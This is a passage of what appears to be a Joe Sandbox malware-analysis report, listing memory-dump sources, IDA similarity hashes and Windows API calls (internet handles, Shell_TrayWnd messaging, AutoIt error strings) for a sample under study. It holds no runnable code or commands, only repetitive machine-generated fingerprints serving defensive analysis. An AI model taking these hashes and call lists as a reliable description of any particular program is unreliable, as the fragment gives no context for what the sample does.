          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend_mallocwsprintf
          • String ID: %d/%02d/%02d
          • API String ID: 1262938277-328681919
          • Opcode ID: 8cac45242f9433e68153c1ae211366bbc30df715c5275547c11c27030803af4d
          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
          • Opcode Fuzzy Hash: 8cac45242f9433e68153c1ae211366bbc30df715c5275547c11c27030803af4d
          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
          APIs
          • InternetCloseHandle.WININET(?), ref: 00442663
          • InternetCloseHandle.WININET ref: 00442668
            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CloseHandleInternet$ObjectSingleWait
          • String ID: aeB
          • API String ID: 857135153-906807131
          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
          APIs
          • FindWindowW.USER32 ref: 00441BFE
          • PostMessageW.USER32 ref: 00441C05
            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FindMessagePostSleepWindow
          • String ID: Shell_TrayWnd
          • API String ID: 529655941-2988720461
          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
          APIs
          • FindWindowW.USER32 ref: 00441C2A
          • PostMessageW.USER32 ref: 00441C3D
            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FindMessagePostSleepWindow
          • String ID: Shell_TrayWnd
          • API String ID: 529655941-2988720461
          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
          APIs
          • MessageBoxW.USER32 ref: 004370D1
            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Message_doexit
          • String ID: AutoIt$Error allocating memory.
          • API String ID: 1993061046-4017498283
          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D